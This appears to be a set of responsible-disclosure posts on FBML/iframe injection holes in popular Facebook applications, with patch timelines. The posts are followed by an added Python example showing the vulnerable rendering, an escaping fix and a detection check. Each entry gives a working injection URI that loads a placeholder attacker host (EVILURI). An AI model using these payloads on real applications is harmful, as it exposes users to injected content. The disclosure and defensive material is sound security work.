FAXX Hack: Hug Me

Current Monthly Active Users: 3,157,995

Current Rank on Application Leaderboard: 55

Application Developer: RockYou

Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.

Vulnerability Status: Unpatched. Update: Patched Sep. 30

Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

FAXX Hack: Dogbook

Current Monthly Active Users: 711,503

Current Rank on Application Leaderboard: 159

Application Developer: Poolhouse

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dogbook/search/?name=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

FAXX Hack: myFarm

(This counts as Sunday’s FAXX Hack.)

Current Monthly Active Users: 945,452

Current Rank on Application Leaderboard: 121

Application Developer: playSocial & take(5)social

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/farmgame/post.pS?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

FAXX Hack: People I Love!

Current Monthly Active Users: 986,796

Current Rank on Application Leaderboard: 119

Application Developer: Chad Morovitz

Responsiveness: I received no communication from the developers, but Facebook did. The hole was patched about a week after notification.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/dd832a5e70919175222a209559b89f4b/browse.php?m=n%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E&p=1&process=1

FAXX Hack: Photos I Love!

Current Monthly Active Users: 1,100,267

Current Rank on Application Leaderboard: 113

Application Developer: PhotosILove

Responsiveness: About a week after notification the hole remained live, but I checked back with Facebook and things got patched up.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/photosilove/browse.php?m=u&user=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer got in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

FAXX Hack: Willy’s Sweet Shop

Facebook Verified Application

Current Monthly Active Users: 853,598

Current Rank on Application Leaderboard: 136

Application Developer: Mob Science

Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Unpatched. Update: Patched Sep. 24

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D’http%3A%2F%2FEVILURI%2F’%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.
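Every entry on this page uses the same vector: a query parameter is echoed unescaped into the FBML an application returns to Facebook, so the decoded value closes the surrounding attribute and injects an fb:iframe. The following is an added example, not code from the original posts or from any of the listed applications; the template strings are hypothetical, and the sample URI is the one from the Hug Me entry, used to show the vulnerable rendering, the escaped fix, and a check a log reviewer can run over request URIs.

```python
import html
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample input: the Example URI from the Hug Me entry above.
SAMPLE_URI = ("http://apps.facebook.com/doittome/refreshAd.php"
              "?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E")


def query_param(uri, name):
    """Return the URL-decoded value of one query parameter (first occurrence)."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_unescaped(value):
    """Vulnerable pattern (hypothetical template): the parameter is dropped
    straight into an attribute of the FBML the app hands back to Facebook."""
    return '<a href="refreshAd.php?guid=%s">Refresh</a>' % value


def render_escaped(value):
    """Fixed pattern: HTML-escape the value before it lands in the attribute.
    quote=True also turns the attacker's closing double quote into &quot;."""
    return '<a href="refreshAd.php?guid=%s">Refresh</a>' % html.escape(value, quote=True)


def contains_fb_tag(markup):
    """True if the rendered markup carries an fb: tag the template never wrote.
    (The hypothetical template above emits no fb: tags of its own.)"""
    return "<fb:" in markup.lower()


def looks_like_faxx_request(request_uri):
    """Log-review check: decode the request URI and look for an injected fb: tag.
    Each Example URI on this page carries it as %3Cfb%3A... in the query string."""
    decoded = unquote_plus(request_uri).lower()
    return "<fb:" in decoded
```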
